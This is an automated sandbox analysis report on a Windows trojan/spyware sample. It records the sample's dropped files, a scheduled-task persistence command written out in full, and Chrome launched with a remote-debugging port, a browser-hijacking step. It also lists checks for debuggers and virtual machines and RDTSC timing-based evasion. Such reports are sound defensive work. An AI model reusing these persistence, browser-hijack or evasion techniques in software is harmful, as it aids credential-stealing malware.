Source: chrome.exe, 00000003.00000002.1869897873.00004690000EC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sctauditing-pa.googleapis.com/v1/knownscts/length/$1/prefix/$2?key=AIzaSyBOti4mM-6x9WDnZIjIe
Source: chrome.exe, 00000003.00000002.1870694545.000046900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://securitydomain-pa.googleapis.com/v1/
Source: chrome.exe, 00000003.00000002.1875497350.0000469000C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1873445020.0000469000828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1872201219.0000469000518000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1873415363.000046900080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actions
Source: chrome.exe, 00000003.00000002.1875497350.0000469000C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1873445020.0000469000828000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1872201219.0000469000518000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1873415363.000046900080C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://sites.google.com/u/0/create?usp=chrome_actionsactions
Source: chrome.exe, 00000003.00000002.1874390773.0000469000A4C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 00000003.00000002.1870627417.00004690001E0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tasks.googleapis.com/
Source: chrome.exe, 00000003.00000002.1875053751.0000469000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 00000003.00000002.1870694545.000046900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 00000003.00000002.1875105075.0000469000C30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 00000003.00000002.1875105075.0000469000C30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: chrome.exe, 00000003.00000002.1869517782.0000469000014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1872853987.00004690006E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000003.00000002.1872679946.000046900064C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000003.00000002.1875569235.0000469000CCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1873474952.000046900084C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/Char
Source: chrome.exe, 00000003.00000002.1875540098.0000469000CAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2
Source: chrome.exe, 00000003.00000002.1875540098.0000469000CAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2$
Source: chrome.exe, 00000003.00000002.1875540098.0000469000CAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/ddljson?async=ntp:2hd/
Source: chrome.exe, 00000003.00000002.1869747122.00004690000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_
Source: chrome.exe, 00000003.00000002.1869747122.00004690000A8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_b?7
Source: chrome.exe, 00000003.00000002.1876776514.0000469000F7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1877466661.0000469001168000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0
Source: chrome.exe, 00000003.00000002.1877521932.0000469001194000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/async/newtab_promos
Source: chrome.exe, 00000003.00000002.1870694545.000046900020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1874134672.0000469000994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1876878204.0000469000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1873579729.00004690008B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000003.00000002.1870694545.000046900020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1874134672.0000469000994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1876878204.0000469000FAC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1873579729.00004690008B0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 00000003.00000002.1876429079.0000469000EAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: chrome.exe, 00000003.00000002.1876310954.0000469000E68000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=
Source: chrome.exe, 00000003.00000002.1875159742.0000469000C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1873182640.0000469000794000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1870929206.00004690002D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1872332659.0000469000554000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1872679946.000046900064C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chrome.exe, 00000003.00000002.1875159742.0000469000C54000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.icovements.
Source: chrome.exe, 00000003.00000003.1859116123.000046900120C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000003.00000002.1872201219.0000469000518000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000003.00000002.1874504240.0000469000AAC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 00000003.00000002.1869517782.0000469000014000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000003.00000002.1870694545.000046900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000003.00000002.1870694545.000046900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000003.00000002.1870694545.000046900020C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1872620671.000046900061C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000003.00000002.1875159742.0000469000C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1870694545.000046900020C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000003.00000002.1872201219.0000469000518000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000003.00000002.1875053751.0000469000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000003.00000003.1851423946.0000469000C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1871906050.00004690004CA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000003.00000002.1875159742.0000469000C54000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1851423946.0000469000C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1871906050.00004690004CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1875053751.0000469000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000003.00000003.1851423946.0000469000C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1871906050.00004690004CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1875053751.0000469000C0C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000003.00000002.1872853987.00004690006E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1851423946.0000469000C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1871906050.00004690004CA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1875080719.0000469000C20000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.1858724580.0000469000C1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.1872679946.000046900064C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49723
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE59BA6 CloseHandle,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,CloseClipboard, 9_2_6BE59BA6
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE59D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_6BE59D11
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_6BE59C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard, 9_2_6BE59C22

System Summary

Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File dump: service123.exe.0.dr 314617856
Source: nRYpZg6i5E.exe Static PE information: section name:
Source: nRYpZg6i5E.exe Static PE information: section name: .idata
Source: nRYpZg6i5E.exe Static PE information: section name:
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process Stats: CPU usage > 49%
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BF0ADB0 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BF136E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BF13820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BF15A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BF15980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BF13560 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: String function: 6BF13B20 appears 38 times
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 1812
Source: nRYpZg6i5E.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
Source: nRYpZg6i5E.exe Static PE information: Section: scgdxyhl ZLIB complexity 0.9943612639793318
Source: nRYpZg6i5E.exe Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/7@16/5
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File created: C:\Users\user\AppData\Local\uABDlLMkuJ
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Mutant created: \Sessions\1\BaseNamedObjects\My_mutex
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1960
Source: C:\Users\user\AppData\Local\Temp\service123.exe Mutant created: \Sessions\1\BaseNamedObjects\woUNydxtUFQatgBImlJF
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3912:120:WilError_03
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: chrome.exe, 00000003.00000002.1873215998.00004690007BC000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: nRYpZg6i5E.exe Virustotal: Detection: 51%
Source: nRYpZg6i5E.exe ReversingLabs: Detection: 44%
Source: unknown Process created: C:\Users\user\Desktop\nRYpZg6i5E.exe "C:\Users\user\Desktop\nRYpZg6i5E.exe"
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2376,i,13757376621657589230,16986117785964679361,262144 /prefetch:8
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1960 -s 1812
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2376,i,13757376621657589230,16986117785964679361,262144 /prefetch:8
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: winmm.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\service123.exe Section loaded: ellrgatenshkoykertxa.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: xmllite.dll
Source: nRYpZg6i5E.exe Static file information: File size 4458496 > 1048576
Source: nRYpZg6i5E.exe Static PE information: Raw size of is bigger than: 0x100000 < 0x283400
Source: nRYpZg6i5E.exe Static PE information: Raw size of scgdxyhl is bigger than: 0x100000 < 0x1b9800
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 9_2_00968230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError, 9_2_00968230
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: nRYpZg6i5E.exe Static PE information: real checksum: 0x4450a6 should be: 0x44afd5
Source: nRYpZg6i5E.exe Static PE information: section name:
Source: nRYpZg6i5E.exe Static PE information: section name: .idata
Source: nRYpZg6i5E.exe Static PE information: section name:
Source: nRYpZg6i5E.exe Static PE information: section name: scgdxyhl
Source: nRYpZg6i5E.exe Static PE information: section name: mvkmyqrl
Source: nRYpZg6i5E.exe Static PE information: section name: .taggant
Source: service123.exe.0.dr Static PE information: section name: .eh_fram
Source: ELLRGATenShKoyKeRtXA.dll.0.dr Static PE information: section name: .eh_fram
Source: nRYpZg6i5E.exe Static PE information: section name: scgdxyhl entropy: 7.955672521495908
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File created: C:\Users\user\AppData\Local\Temp\ELLRGATenShKoyKeRtXA.dll
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File created: C:\Users\user\AppData\Local\Temp\service123.exe

Boot Survival

Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\service123.exe Evasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\service123.exe Stalling execution: Execution stalls by calling Sleep
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: PROCMON.EXE
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WINDBG.EXE
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNUM_PROCESSORNUM_RAMNAMEALLFREEDRIVERSNUM_DISPLAYSRESOLUTION_XRESOLUTION_Y\*RECENT_FILESPROCESSESUPTIME_MINUTESC:\WINDOWS\SYSTEM32\VBOX*.DLL01VBOX_FIRSTSYSTEM\CONTROLSET001\SERVICES\VBOXSFVBOX_SECONDC:\USERS\PUBLIC\PUBLIC_CHECKWINDBG.EXEDBGWIRESHARK.EXEPROCMON.EXEX64DBG.EXEIDA.EXEDBG_SECDBG_THIRDYADROINSTALLED_APPSSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALLSOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL%D%S\%SDISPLAYNAMEAPP_NAMEINDEXCREATETOOLHELP32SNAPSHOT FAILED.
Source: nRYpZg6i5E.exe, 00000000.00000003.1445284974.0000000007110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: WIRESHARK.EXE
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFABEA second address: AFABEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFABEE second address: AFAC0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007FD5E9559C76h 0x0000000f push edi 0x00000010 pop edi 0x00000011 jne 00007FD5E9559C76h 0x00000017 popad 0x00000018 push ecx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFAC0A second address: AFAC10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFAEF7 second address: AFAF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 jo 00007FD5E9559C82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFAF06 second address: AFAF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFAF0C second address: AFAF14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB075 second address: AFB09C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD5E912D9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jmp 00007FD5E912D9F2h 0x00000010 pop edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB09C second address: AFB0A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB0A0 second address: AFB0BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FD5E912D9F6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB0BC second address: AFB0C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB4B3 second address: AFB4BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB4BF second address: AFB4C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FD5E9559C76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB4C9 second address: AFB4CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB4CD second address: AFB4D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB5F4 second address: AFB5FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFB5FA second address: AFB60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD5E9559C7Eh 0x0000000a jg 00007FD5E9559C76h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE2BF second address: AFE2C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE2C3 second address: AFE2D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD5E9559C7Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE2D8 second address: AFE2E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\nRYpZg6i5E.exe RDTSC instruction interceptor: First address: AFE2E4 second address: AFE2E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
